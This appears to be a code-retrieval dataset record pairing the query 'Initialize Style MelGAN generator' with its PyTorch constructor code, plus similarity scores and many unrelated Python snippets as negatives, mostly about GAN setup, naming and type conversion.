This hack\r\n # always returns the same filename\r\n parts[-1] = '__ipython-input__'\r\n filename = '-'.join(parts)\r\n if filename.endswith('.py'):\r\n filename = filename[:-3]\r\n module = module + '-' + filename\r\n module = module.split('.')\r\n if hasattr(func, 'func_name'):\r\n name = func.func_name\r\n elif hasattr(func, '__name__'):\r\n name = func.__name__\r\n else:\r\n name = 'unknown'\r\n # Hack to detect functions not defined at the module-level\r\n if resolv_alias:\r\n # TODO: Maybe add a warning here?\r\n if hasattr(func, 'func_globals') and name in func.func_globals:\r\n if not func.func_globals[name] is func:\r\n name = '%s-alias' % name\r\n if inspect.ismethod(func):\r\n # We need to add the name of the class\r\n if hasattr(func, 'im_class'):\r\n klass = func.im_class\r\n module.append(klass.__name__)\r\n if os.name == 'nt' and win_characters:\r\n # Stupid windows can't encode certain characters in filenames\r\n name = _clean_win_chars(name)\r\n module = [_clean_win_chars(s) for s in module]\r\n return module, name", "def _conversion_factor_internal(unit: str):\n return globals()[unit]", "def _generate_function_specific_name(a, vertices):\n coeff_hash = hash(str(a))\n if coeff_hash < 0:\n # Cannot have minus sign in name\n coeff_hash *= -1\n vertices_hash = hash(str(vertices))\n if vertices_hash < 0:\n # Cannot have minus sign in name\n vertices_hash *= -1\n return str(coeff_hash) + \"_\" + str(vertices_hash)", "def get_cnn_fn(model, num_classes):\n model = model.lower()\n assert model == \"cnn\"\n\n if num_classes != 10:\n raise ValueError(\n f\"Model {model} supports only 10 classes, {num_classes} given.\")\n def cnn_model_fn(*args, **kwargs):\n return cnn.CifarNet(*args, **kwargs)\n return cnn_model_fn", "def cftype_to_value(cftype):\n if not cftype:\n return None\n typeID = cf.CFGetTypeID(cftype)\n if typeID in known_cftypes:\n convert_function = known_cftypes[typeID]\n return convert_function(cftype)\n else:\n return cftype", "def mode_to_text(cls, mode: int) -> str:\n if mode == cls.ModeCV:\n return 'CV'\n elif mode == cls.ModeCC:\n return 'CC'\n else:\n return 'EE'", "def convert_type(self, name, type):\n\t\t#\t\tprint 'Called with name = %s and type = %s' %(name, type)\n\t\tname = ''.join(name.split())\n\t\ttype = ''.join(type.split())\n\n\t\tif re.match(r'\\w+', type): #It's a concrete type\n\t\t\treturn self.TYPES_DICT.get(type,type) + ' ' + name\n\n\t\tarrow = type.rfind('->')\n\t\tassert arrow != -1, \"If it's not a primitive, it must be a function\"\n\t\tparams, return_type = type[:arrow], type[arrow+2:]\n\t\tassert params[0] == '(' and params[-1] == ')'\n\t\tparams = params[1:-1]\n\n\t\tparams_tokenized = Lexer(params).get_tokens()\n\t\tparam_list = self.split_params(params_tokenized)\n\t\tcpp_params = map(lambda n: self.convert_type('', n), param_list)\n\t\treturn_type = self.convert_type('', return_type)\n\t\treturn return_type + '(*' + name + ')(' + ','.join(cpp_params) + ')'", "def name(self):\n name = self.function_name\n\n # Feature type is based on additional data that used\n # for example if insight is for Healthsites Facilities\n # than feature type is Healthsites Facilities\n\n if self.feature_type:\n name = '%s for %s' % (name, self.feature_type)\n return name", "def get_encoder_fn_separate(model_type, \n # e.g., model_type = 'resnet_fc3_dropout'\n encoder_fn_type = \"Encoder_resnet_v2\"\n ):\n encoder_fn = None\n threed_fn = None\n if 'resnet' in model_type:\n #encoder_fn = Encoder_resnet\n # added by CCJ\n encoder_fn = Encoder_resnet_v2\n if 
encoder_fn_type is \"Encoder_resnet\":\n encoder_fn = Encoder_resnet\n\n else:\n print('Unknown encoder %s!' % model_type)\n exit(1)\n\n if 'fc3_dropout' in model_type:\n threed_fn = Encoder_fc3_dropout\n\n if encoder_fn is None or threed_fn is None:\n print('Dont know what encoder to use for %s' % model_type)\n import ipdb\n ipdb.set_trace()\n\n return encoder_fn, threed_fn", "def convert_to_premis_hash_function(hash_type):\n if hash_type.lower().startswith(\"sha\") and \"-\" not in hash_type:\n hash_type = \"SHA-\" + hash_type.upper()[3:]\n elif hash_type.lower() == \"md5\":\n return \"MD5\"\n\n return hash_type", "def getFunctionClass(functionID):\n d = { 1: Linear,\n 2: LinearDrag,\n 11: Gaussian,\n 12: GaussianDrag,\n 21: Lorentzian,\n 22: LorentzianDrag }\n return d[functionID]", "def _get_name(self):\n return '%s: %s-%s' % (\n self.fcs_number,\n self.parameter_type,\n self.parameter_value_type)", "def get_converter(from_case: Optional[LetterCaseType], to_case: LetterCaseType) -> Optional[ConverterType]:\n to_case = get_letter_case(to_case)\n\n name = f\"to_{to_case.name.lower()}_case\"\n\n if from_case is not None:\n from_case = get_letter_case(from_case)\n name = f\"{from_case.name.lower()}_{name}\"\n\n return globals().get(name)", "def name(inp, mode, **kwargs):\n return name.dispatch(inp, mode, **kwargs)", "def gen_funcs_with_const(self):\n func_with_const = '\\n (func (export \"{lane_type}.{op}_with_const_{cnt}\") (result v128) ({lane_type}.{op} {param_1} {param_2}))'\n func_with_param_and_const = '\\n (func (export \"{lane_type}.{op}_with_const_{cnt}\") (param v128) (result v128) ({lane_type}.{op} (local.get 0) {param_1}))'\n funcs = ''\n cnt = 0\n for op in self.BINARY_OPS:\n for param_1, param_2 in self.get_test_data_with_const:\n funcs += func_with_const.format(lane_type=self.LANE_TYPE,\n op=op,\n param_1=SIMD.v128_const(param_1, self.LANE_TYPE),\n param_2=SIMD.v128_const(param_2, self.LANE_TYPE),\n cnt=cnt)\n cnt += 1\n\n for op in self.BINARY_OPS:\n for param_1, param_2 in self.get_test_data_with_const:\n funcs += func_with_param_and_const.format(lane_type=self.LANE_TYPE,\n op=op,\n param_1=SIMD.v128_const(param_1, self.LANE_TYPE),\n cnt=cnt)\n cnt += 1\n\n return funcs", "def fn(name : str, *, input : 'NET', gnd : 'NET', output : 'NET'):\n return make_component(name, type, {\"in\": input, \"gnd\":gnd, \"out\":output}, [], {'voltage': voltage}, prefix=\"U\")", "def _detect_name(self):\n\n if 'Model name' in self.cpu_info:\n return self.cpu_info['Model name']\n\n # CPUs C/S Nodes Sockets\n # D03 16 4 1 4 (likely to change in the future)\n # D05 64 32 4 2\n # Amber 46-92 46 1 1-2\n # Tx2 28~224 28 2 1-2\n elif int(self.cpu_info['CPU(s)']) == 16 and \\\n int(self.cpu_info['Socket(s)']) == 4:\n return \"D03\"\n\n elif int(self.cpu_info['CPU(s)']) == 64 and \\\n int(self.cpu_info['Socket(s)']) == 2 and \\\n int(self.cpu_info['NUMA node(s)']) == 4:\n return \"D05\"\n\n elif int(self.cpu_info['Core(s) per socket']) == 46 and \\\n int(self.cpu_info['NUMA node(s)']) == 1:\n return \"Amberwing\"\n\n elif int(self.cpu_info['Core(s) per socket']) == 28 and \\\n int(self.cpu_info['NUMA node(s)']) == 2:\n return \"ThunderX2\"", "def _get_conversion_disk_Type(self, _src_disk_extn, _dest_disk_extn):\r\n\r\n disk_conversion = {\r\n \"vhdx\": {\r\n \"vhd\": (\"VIRTUAL_HARD_DISKS\", \"VHD_DYNAMIC\"),\r\n \"vmdk\": (\"VMDK_FILES\", \"VMDK_VCB4\")\r\n },\r\n \"vmdk\": {\r\n \"vhd\": (\"VIRTUAL_HARD_DISKS\", \"VHD_DYNAMIC\"),\r\n \"vhdx\": (\"VIRTUAL_HARD_DISKS\", \"VHDX_DYNAMIC\")\r\n }\r\n 
}\r\n _src_disk_extn = _src_disk_extn.lower().strip(\".\")\r\n _dest_disk_extn = _dest_disk_extn.lower().strip(\".\")\r\n\r\n return disk_conversion[_src_disk_extn][_dest_disk_extn]", "def GetSurfaceConversion(self, *args):\n return _ShapeUpgrade.ShapeUpgrade_ShapeConvertToBezier_GetSurfaceConversion(self, *args)", "def _cmplx_factory_ ( cmplxt , re , im ) :\n return cmplxt ( re , im )", "def pad_arguments_np2cv(padding_mode):\r\n\r\n #Check that the padding_mode is actually supported by OpenCV\r\n supported = [\"constant\",\"edge\",\"reflect\",\"symmetric\",\"wrap\"]\r\n assert padding_mode in supported, \"The padding mode: '\"+padding_mode+\"' is\\\r\n not supported\"\r\n \r\n if padding_mode==\"constant\":\r\n return \"cv2.BORDER_CONSTANT\"\r\n if padding_mode==\"edge\":\r\n return \"cv2.BORDER_REPLICATE\"\r\n if padding_mode==\"reflect\":\r\n return \"cv2.BORDER_REFLECT_101\"\r\n if padding_mode==\"symmetric\":\r\n return \"cv2.BORDER_REFLECT\"\r\n if padding_mode==\"wrap\":\r\n return \"cv2.BORDER_WRAP\"", "def fmtd_str(self,c=False,prefix_symbol=\"\"):\n psym = prefix_symbol\n ms1 = (\n f\"{self.filename_prefix_mono}{self.event_kind:9} \"\n f\"{self.separator * len(self.stack)} \"\n )\n lms1 = len(ms1)+len(\"(\")\n join_mstr = f\",\\n{' '*lms1}\"\n mavs = (\n f\"{self.argvars}\"\n )\n ms = f\"{psym}{ms1}{mavs}\"\n if c:\n aac = argvars_argname_color = \"MAGENTA\"\n ps1 = (\n f\"{self.filename_prefix_poly}{self.color.fore(f'{self.event_kind:9}','KIND')} \"\n f\"{self.separator * len(self.stack)} \"\n )\n lps1 = lms1\n join_pstr = f\",\\n{' '*lps1}\"\n pavs = (\n f\"{self.argvars}\"\n )\n ps = f\"{psym}{ps1}{pavs}\"\n return ps\n return ms", "def string_conversion_method(self) -> tp.Callable:\n\n # First, look for a method defined for this specific type.\n try:\n field_type_name = self.field_type.__name__\n except AttributeError:\n raise AttributeError(f\"Could not detect name of field type {self.field_type}.\")\n try:\n return getattr(self, f\"_string_to_{field_type_name}\")\n except AttributeError:\n pass\n\n # Try a super-type method.\n if issubclass(self.field_type, str):\n return lambda value: value\n if issubclass(self.field_type, GameObjectSequence):\n return self._string_to_GameObjectSequence\n if issubclass(self.field_type, GameObject):\n return self._string_to_GameObject\n if issubclass(self.field_type, IntEnum):\n raise NotImplementedError\n\n raise AttributeError(f\"Could not find field update method '_string_to_{field_type_name}' or a superclass.\")", "def __resolveCommandType(self, command, e):\n # check for existing DCC Connection\n try:\n if self.__IpToUser[e.source()]['auth'] == NOT_AUTHED:\n return 'not_authed_dcc'\n else:\n return 'authed_dcc'\n # DCC Connection does not exist\n except KeyError:\n\n if not is_channel(e.target()):\n return 'query'\n else:\n # defaults to channel\n return 'channel'", "def gwcalctyp(self):\n dig0 = str(self._SIGMA_TYPES[self.type])\n dig1 = str(self._SC_MODES[self.sc_mode])\n return dig1.strip() + dig0.strip()", "def get_class_functional_name(name):\n name = _strip_class_name(name)\n return name", "def convertColorSpace(\n self,\n img, # Image in some color space\n srcColorSpace = 'BGR', # Source color space\n tgtColorSpace = 'RGB', # Traget color space\n ):\n\n if srcColorSpace == tgtColorSpace:\n return img\n\n if srcColorSpace == 'BGR':\n img_bgr = img\n elif srcColorSpace == 'RGB':\n img_bgr = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n elif srcColorSpace == 'HSV':\n img_bgr = cv2.cvtColor(img, cv2.COLOR_HSV2BGR)\n elif srcColorSpace == 
'HLS':\n img_bgr = cv2.cvtColor(img, cv2.COLOR_HLS2BGR)\n elif srcColorSpace == 'LUV':\n img_bgr = cv2.cvtColor(img, cv2.COLOR_LUV2BGR)\n elif srcColorSpace == 'YUV':\n img_bgr = cv2.cvtColor(img, cv2.COLOR_YUV2BGR)\n elif srcColorSpace == 'YCrCb':\n img_bgr = cv2.cvtColor(img, cv2.COLOR_YCrCb2BGR)\n else:\n raise Exception(\"Incorrect color space: {}\".format(srcColorSpace))\n\n if tgtColorSpace == 'BGR':\n img_tgt = img_bgr\n elif tgtColorSpace == 'RGB':\n img_tgt = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2RGB)\n elif tgtColorSpace == 'HSV':\n img_tgt = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2HSV)\n elif tgtColorSpace == 'HLS':\n img_tgt = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2HLS)\n elif tgtColorSpace == 'LUV':\n img_tgt = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2LUV)\n elif tgtColorSpace == 'YUV':\n img_tgt = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2YUV)\n elif tgtColorSpace == 'YCrCb':\n img_tgt = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2YCrCb)\n else:\n raise Exception(\"Incorrect color space: {}\".format(tgtColorSpace))\n\n return img_tgt", "def convert_barcode_id_to_name(multiplex, fc_name, fq):\n fqout = list([None, None])\n if multiplex is None:\n fqout[0] = fq[0]\n if not fq[1] == None:\n fqout[1] = fq[1]\n else:\n bcid2name = dict([(mp['barcode_id'], mp['name']) for mp in multiplex])\n for bcid in bcid2name.keys():\n mstr = \"%s_%s_\" % (fc_name, bcid) \n if fq[0].find(mstr) != -1:\n from_str = \"%s_%s_\" %(fc_name, bcid)\n to_str = \"%s_%s_\" %(fc_name, bcid2name[bcid])\n fqout[0] = fq[0].replace(from_str, to_str)\n if not fq[1] == None:\n fqout[1] = fq[1].replace(from_str, to_str)\n fqout[0] = fqout[0].replace(\"_fastq.txt\", \".fastq\")\n if not fqout[1] == None:\n fqout[1] = fqout[1].replace(\"_fastq.txt\", \".fastq\")\n return os.path.basename(fqout[0]), (os.path.basename(fqout[1]) if len(fqout) > 1 else None)", "def fips(self, cname: str)->str:\n return self.__call__(cname)" ]
[ "0.58428967", "0.5695806", "0.56170404", "0.5537308", "0.54060704", "0.5312154", "0.52636075", "0.5209674", "0.5179819", "0.5158412", "0.5142017", "0.51086265", "0.50943804", "0.5006753", "0.5005477", "0.5003055", "0.49839967", "0.4969238", "0.49600613", "0.49500346", "0.48891428", "0.4872849", "0.48529443", "0.48464608", "0.48418045", "0.48335046", "0.48040202", "0.4775935", "0.47739902", "0.47731254", "0.47590137", "0.4756362", "0.4756362", "0.47552416", "0.47494853", "0.47325927", "0.47168714", "0.47113734", "0.46452442", "0.46417695", "0.46097383", "0.46029195", "0.46023118", "0.45945963", "0.45915323", "0.45858833", "0.45832995", "0.45831198", "0.45790198", "0.45789585", "0.45668328", "0.45571667", "0.4527899", "0.4525675", "0.45241448", "0.4518084", "0.4514835", "0.4512257", "0.45112363", "0.45110485", "0.45063925", "0.45056728", "0.45030665", "0.44982713", "0.44965133", "0.4487131", "0.44787735", "0.44755375", "0.44737518", "0.44665986", "0.44593948", "0.44589195", "0.4456767", "0.44548878", "0.44547075", "0.4451067", "0.44485563", "0.44485366", "0.44453758", "0.44427857", "0.44299322", "0.44141862", "0.4411273", "0.4409295", "0.440585", "0.44051456", "0.44037864", "0.44027153", "0.44026473", "0.4401877", "0.43891197", "0.43884054", "0.4387848", "0.4379409", "0.43780482", "0.43749568", "0.4369691", "0.43680164", "0.43675154", "0.4366187" ]
0.80150145
0
Initialize Style MelGAN generator.
def __init__( self, in_channels=128, aux_channels=80, channels=64, out_channels=1, kernel_size=9, dilation=2, bias=True, noise_upsample_scales=[11, 2, 2, 2], noise_upsample_activation="LeakyReLU", noise_upsample_activation_params={"negative_slope": 0.2}, upsample_scales=[2, 2, 2, 2, 2, 2, 2, 2, 1], upsample_mode="nearest", gated_function="softmax", use_weight_norm=True, ): super().__init__() self.in_channels = in_channels noise_upsample = [] in_chs = in_channels for noise_upsample_scale in noise_upsample_scales: # NOTE(kan-bayashi): How should we design noise upsampling part? noise_upsample += [ torch.nn.ConvTranspose1d( in_chs, channels, noise_upsample_scale * 2, stride=noise_upsample_scale, padding=noise_upsample_scale // 2 + noise_upsample_scale % 2, output_padding=noise_upsample_scale % 2, bias=bias, ) ] noise_upsample += [ getattr(torch.nn, noise_upsample_activation)( **noise_upsample_activation_params ) ] in_chs = channels self.noise_upsample = torch.nn.Sequential(*noise_upsample) self.noise_upsample_factor = np.prod(noise_upsample_scales) self.blocks = torch.nn.ModuleList() aux_chs = aux_channels for upsample_scale in upsample_scales: self.blocks += [ TADEResBlock( in_channels=channels, aux_channels=aux_chs, kernel_size=kernel_size, dilation=dilation, bias=bias, upsample_factor=upsample_scale, upsample_mode=upsample_mode, gated_function=gated_function, ), ] aux_chs = channels self.upsample_factor = np.prod(upsample_scales) self.output_conv = torch.nn.Sequential( torch.nn.Conv1d( channels, out_channels, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2, ), torch.nn.Tanh(), ) # apply weight norm if use_weight_norm: self.apply_weight_norm() # reset parameters self.reset_parameters()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def model_setup(self):\n self.DNN = SganMLP(self.settings.number_of_bins)\n self.D = SganMLP(self.settings.number_of_bins)\n self.G = Generator()", "def model_setup(self):\n self.DNN = DgganMLP(self.settings.hidden_size)\n self.D = DgganMLP(self.settings.hidden_size)\n self.G = Generator(self.settings.hidden_size)", "def build_model(cls, args):\n base_architecture(args) \n return StyleGANGeneratorPretrain(args)", "def init_net(self):\r\n # initialize the generator network\r\n g_net = Net(\r\n self.architecture['generator'], net_name='gen',\r\n data_format=FLAGS.IMAGE_FORMAT, num_class=self.num_class)\r\n # define layer connections in generator\r\n self.Gen = Routine(g_net)\r\n self.Gen.add_input_layers([64, self.code_size], [0])\r\n self.Gen.seq_links(list(range(g_net.num_layers)))\r\n self.Gen.add_output_layers([g_net.num_layers - 1])\r\n\r\n # initialize the generator network\r\n d_net = Net(\r\n self.architecture['discriminator'], net_name='dis',\r\n data_format=FLAGS.IMAGE_FORMAT, num_class=self.num_class)\r\n # define layer connections in generator\r\n self.Dis = Routine(d_net)\r\n self.Dis.add_input_layers([64] + list(self.architecture['input'][0]), [0])\r\n self.Dis.seq_links(list(range(d_net.num_layers)))\r\n self.Dis.add_output_layers([d_net.num_layers - 1])", "def initialize(self):\n self.write_model(path=PATH.GRAD, suffix='new')\n\n if PAR.RANDOM_OVER_IT or optimize.iter == 1:\n self.get_random_frequencies()\n\n print('Generating synthetics')\n system.run('solver', 'eval_func',\n hosts='all',\n path=PATH.GRAD)\n\n self.write_misfit(path=PATH.GRAD, suffix='new')", "def __init__(self, **kwargs: dict) -> None:\n super(AnimeGAN_v2, self).__init__()\n self.model_name: str = 'animeGAN_v2'\n self.model_version: str = '1.0.0'\n \n self.pretrained_model_path: str = kwargs['pretrained_model_path']\n\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n torch.set_grad_enabled(False)\n\n self.model = Generator().eval().to(self.device)\n ckpt = torch.load(self.pretrained_model_path, map_location=self.device)\n self.model.load_state_dict(ckpt)", "def __init__(self, model_name, logger=None, gpu_ids=None):\n super().__init__(model_name, 'generator', logger, gpu_ids)", "def __init__(self, random_generator: RandomState):\n super().__init__([MoldelStacker(random_generator), SocialMediaLayer()])", "def __init__(self, use_wasserstein=True):\n\n opt = WassersteinCycleGANTestOptions if use_wasserstein else CycleGANTestOptions\n\n opt.checkpoints_dir = os.path.join(\n pathlib.Path(__file__).parent.absolute(), opt.checkpoints_dir\n )\n\n tf_properties = {\n \"load_size\": opt.load_size,\n \"crop_size\": opt.crop_size,\n \"preprocess\": opt.preprocess,\n \"mask\": os.path.join(os.path.dirname(__file__), opt.mask),\n \"no_flip\": True,\n \"grayscale\": True,\n }\n self.transform = get_transform(**tf_properties)\n\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n if opt.is_wgan:\n netg_b_to_a = resnet_generator.ResnetGenerator(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n get_norm_layer(opt.norm),\n dilations=opt.dilations,\n conv_layers_in_block=opt.conv_layers_in_block,\n )\n else:\n netg_b_to_a = generator.create_generator(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n opt.netg,\n opt.norm,\n not opt.no_dropout,\n opt.activation,\n opt.conv_layers_in_block,\n opt.dilations,\n )\n\n netg_b_to_a = init_net(netg_b_to_a, opt.init_type, opt.init_gain, self.device)\n\n ModelClass = CycleGANModel if not opt.is_wgan else 
WassersteinCycleGANModel\n\n self.model = ModelClass.from_dict(\n netg_a_to_b=None, netg_b_to_a=netg_b_to_a, **opt.to_dict()\n )\n\n self.model.networks.load(\n os.path.join(opt.checkpoints_dir, opt.name, f\"{opt.epoch}_net_\"),\n device=self.device,\n )\n self.model.eval()", "def build_gan(self):\n\n # Specify te generators used to build various components.\n optimizer_generator = Adam(0.0002, 0.5)\n optimizer_discriminator = Adam(0.0002, 0.5)\n optimizer_GAN = Adam(0.0002, 0.5)\n\n loss_measure_generator = \"binary_crossentropy\"\n loss_measure_discriminator = \"binary_crossentropy\"\n loss_measure_GAN = \"binary_crossentropy\"\n\n metrics = [\"accuracy\", \"mae\", \"mse\", \"mape\", \"cosine\"]\n\n # See if the specified model paths exist, if they don't then we start training new models\n if (\n hasattr(self, \"discriminator_path\")\n and hasattr(self, \"generator_path\")\n and self.discriminator_path.is_file()\n and self.generator_path.is_file()\n ):\n self.discriminator = load_model(self.discriminator_path)\n self.generator = load_model(self.generator_path)\n print(\"Loaded models...\")\n else: # training new model.\n print(\"Training models...\")\n\n # Generate the tensorboard and its call back\n callback_tensorboard = TensorBoard(\n log_dir=path_log_run, histogram_freq=0, write_images=True\n )\n\n # self.callbacks_list = [callback_tensorboard]\n\n # Build discriminator and compile it.\n self.discriminator = self.build_discriminator()\n\n # Training discriminator!\n self.discriminator.compile(\n loss=loss_measure_discriminator,\n optimizer=optimizer_discriminator,\n # metrics=metrics,\n # callbacks=self.callbacks_list,\n )\n\n # Build generator and compile it.\n self.generator = self.build_generator()\n\n # Training generator!\n self.generator.compile(\n loss=loss_measure_generator,\n optimizer=optimizer_generator,\n # callbacks=self.callbacks_list,\n )\n\n # These next few lines setup the training for the GAN, which the input Vector has a shape of noise_parameters\n z = Input(shape=(self.dimensions_noise,))\n img = self.generator(z)\n\n self.discriminator.trainable = False\n\n # Call the discriminator on the image generated by the generator.\n # Store the output\n valid = self.discriminator(img)\n\n # Form a model that combine both the input and the output pair.\n self.combined = Model(z, valid)\n\n # Compile the model using binary_crossentropy with the\n self.combined.compile(loss=loss_measure_GAN, optimizer=optimizer_GAN)", "def __init__(self, generator, discriminator, noise_dim, save_path):\n self.generator = generator\n self.discriminator = discriminator\n self.noise_dim = noise_dim\n self.save_path = save_path\n self.check_points_path = os.path.join(save_path, 'check_points')\n self.output_image_path = os.path.join(save_path, 'images_during_training')\n self.generator.generate()", "def setup(self):\n\n self.points = [[0.360502, 0.535494],\n [0.476489, 0.560185],\n [0.503125, 0.601218],\n [0.462382, 0.666667],\n [0.504702, 0.5]]\n self.max_neighbors = 4\n self.beta = 1\n self.graph = 'beta skeleton'\n self.edges = [0, 1, 0, 2, 0, 3, 0, 4,\n 1, 3, 1, 4,\n 2, 3, 2, 4,\n 3, 4]", "def init_batch(self):\n pass", "def init():", "def setGenerators(self):\n shape = (self.input_shape[0],self.input_shape[1])\n self.trainGen,self.validateGen = getBatchGenerators(self.batch_size,\n self.dataPath,\n shape,\n self.classMap,\n self.regression)", "def initialise_theano_rng(self):\n\n\t\tself.theano_rng = RandomStreams(self.rng.randint(2**30))", "def init_fn(init_savers, sess):\n ## Load 
Generator weights from MaskGAN checkpoint.\n if FLAGS.maskgan_ckpt:\n print('Restoring Generator from %s.' % FLAGS.maskgan_ckpt)\n tf.logging.info('Restoring Generator from %s.' % FLAGS.maskgan_ckpt)\n print('Asserting Generator is a seq2seq-variant.')\n tf.logging.info('Asserting Generator is a seq2seq-variant.')\n assert FLAGS.generator_model.startswith('seq2seq')\n init_saver = init_savers['init_saver']\n init_saver.restore(sess, FLAGS.maskgan_ckpt)\n\n ## Load the Discriminator weights from the MaskGAN checkpoint if\n # the weights are compatible.\n print('Restoring Discriminator from %s.' % FLAGS.maskgan_ckpt)\n tf.logging.info('Restoring Discriminator from %s.' % FLAGS.maskgan_ckpt)\n dis_init_saver = init_savers['dis_init_saver']\n dis_init_saver.restore(sess, FLAGS.maskgan_ckpt)\n\n else:\n return", "def initialisation(self):\n self.create_variables()\n self.create_placeholders()\n self.build_model()\n self.reset_lr(None, True)\n self.build_loss()\n self.initialised = True", "def load_generator(\n ckpt, is_stylegan1, G_res, out_size, noconst, latent_dim, n_mlp, channel_multiplier, dataparallel, base_res_factor\n):\n if is_stylegan1:\n generator = G_style(output_size=out_size, checkpoint=ckpt).cuda()\n else:\n generator = Generator(\n G_res,\n latent_dim,\n n_mlp,\n channel_multiplier=channel_multiplier,\n constant_input=not noconst,\n checkpoint=ckpt,\n output_size=out_size,\n base_res_factor=base_res_factor,\n ).cuda()\n if dataparallel:\n generator = th.nn.DataParallel(generator)\n return generator", "def initialize(self):\n logger.debug(\"Begin Generation\")\n self.events.begin_generation()", "def initialize(self, parser):\n # basic parameters\n parser.add_argument('--name', type=str, default='cyclegan',\n help='name of the experiment. It decides where to store samples and models')\n parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')\n parser.add_argument('--checkpoints_dir', type=str, default='../ckpts7', help='models are saved here')\n # model parameters\n parser.add_argument('--model', type=str, default='cycle_gan_3d',\n help='chooses which model to use. [cycle_gan_3d | cycle_gan_2d_slice | test ]')\n parser.add_argument('--input_nc', type=int, default=1,\n help='# of input image channels: 3 for RGB and 1 for grayscale')\n parser.add_argument('--output_nc', type=int, default=1,\n help='# of output image channels: 3 for RGB and 1 for grayscale')\n parser.add_argument('--f_map', type=list, default=[16, 32, 64, 128], help='# of gen filters in the last conv layer')\n parser.add_argument('--ngf', type=int, default=64, help='# of gen filters in the last conv layer')\n parser.add_argument('--ndf', type=int, default=64, help='# of discrim filters in the first conv layer')\n parser.add_argument('--netD', type=str, default='basic',\n help='specify discriminator architecture [basic | n_layers | pixel]. The basic model is a 70x70 PatchGAN. 
n_layers allows you to specify the layers in the discriminator')\n parser.add_argument('--typeG', type=str, default='unet',\n help='specify generator architecture [unet | resunet ]')\n parser.add_argument('--n_layers_D', type=int, default=4, help='only used if netD==n_layers')\n parser.add_argument('--norm', type=str, default='instance',\n help='instance normalization or batch normalization [instance | batch | none]')\n parser.add_argument('--init_type', type=str, default='normal',\n help='network initialization [normal | xavier | kaiming | orthogonal]')\n parser.add_argument('--init_gain', type=float, default=0.02,\n help='scaling factor for normal, xavier and orthogonal.')\n parser.add_argument('--no_dropout', action='store_true', help='no dropout for the generator')\n # dataset parameters\n parser.add_argument('--direction', type=str, default='AtoB', help='AtoB or BtoA')\n parser.add_argument('--serial_batches', action='store_true',\n help='if true, takes images in order to make batches, otherwise takes them randomly')\n parser.add_argument('--num_threads', default=4, type=int, help='# threads for loading data')\n parser.add_argument('--batch_size', type=int, default=16, help='input batch size')\n parser.add_argument('--crop_size', type=int, default=16, help='then crop to this size')\n parser.add_argument('--thickness', type=int, default=3, help='thickness when doing the cropping')\n parser.add_argument('--max_dataset_size', type=int, default=float(\"inf\"),\n help='Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.')\n parser.add_argument('--preprocess', type=str, default='resize_and_crop',\n help='scaling and cropping of images at load time [resize_and_crop | crop | scale_width | scale_width_and_crop | none]')\n parser.add_argument('--no_flip', action='store_true',\n help='if specified, do not flip the images for data augmentation')\n parser.add_argument('--display_winsize', type=int, default=256,\n help='display window size for both visdom and HTML')\n # additional parameters\n parser.add_argument('--epoch', type=str, default='latest',\n help='which epoch to load? set to latest to use latest cached model')\n parser.add_argument('--load_iter', type=int, default='0',\n help='which iteration to load? if load_iter > 0, the code will load models by iter_[load_iter]; otherwise, the code will load models by [epoch]')\n parser.add_argument('--verbose', action='store_true', help='if specified, print more debugging information')\n parser.add_argument('--suffix', default='', type=str,\n help='customized suffix: opt.name = opt.name + suffix: e.g., {model}_{netG}_size{load_size}')\n parser.add_argument('--lambda_A', type=float, default=10.0, help='weight for cycle loss (A -> B -> A)')\n parser.add_argument('--lambda_B', type=float, default=10.0, help='weight for cycle loss (B -> A -> B)')\n parser.add_argument('--lambda_identity', type=float, default=0.5,\n help='use identity mapping. Setting lambda_identity other than 0 has an effect of scaling the weight of the identity mapping loss. 
For example, if the weight of the identity loss should be 10 times smaller than the weight of the reconstruction loss, please set lambda_identity = 0.1')\n parser.add_argument('--dim', type=int, default=2, help='2|3')\n parser.add_argument('--dataset', type=str, default='adni',help='select a dataset')\n parser.add_argument('--lambda_cc', type=float, default=0.5,help='use correlation coefficient loss if larger than 0')\n parser.add_argument('--lambda_tv', type=float, default=0.5,help='use total variance regularization if larger than 0')\n parser.add_argument('--fid', action='store_true',help='calculate frechet inception distance')\n parser.add_argument('--srenorm', action='store_true',help='using spatial adaptive denormalization')\n parser.add_argument('--joint_seg', action='store_true',help='learning segmentation instead of input segmentation map, and using spatial adaptive denormalization')\n parser.add_argument('--prob_seg', action='store_true',help='segmentation map is a probability')\n parser.add_argument('--load_epoch', type=int, default=0, help='continue training: the epoch to continue from')\n parser.add_argument('--load_step', type=int, default=0, help='continue training: the step to continue from')\n parser.add_argument('--sem_dropout', action='store_true', help='semantic dropout or not')\n parser.add_argument('--seg_nc', type=int, default=4, help='number of semantic class')\n parser.add_argument('--fold', type=float, default=0, help='fold id for LOOCV')\n parser.add_argument('--mask', action='store_true',help='add mask for brain')\n\n self.initialized = True\n return parser", "def init():\n ########################\n # OPTIONS\n ########################\n # Debugging tools\n global TIMER # displays time of every major step\n TIMER = True\n global MONITOR # displays monitoring infos\n MONITOR = False\n \n global directories\n directories = {'1Face': 'data/1Face/',\n '2Faces': 'data/2Faces/',\n '3Faces': 'data/3Faces/',\n 'test': 'data/test/'}\n \n # Opt. swicthes\n global maxfinder # to find the max dim. 
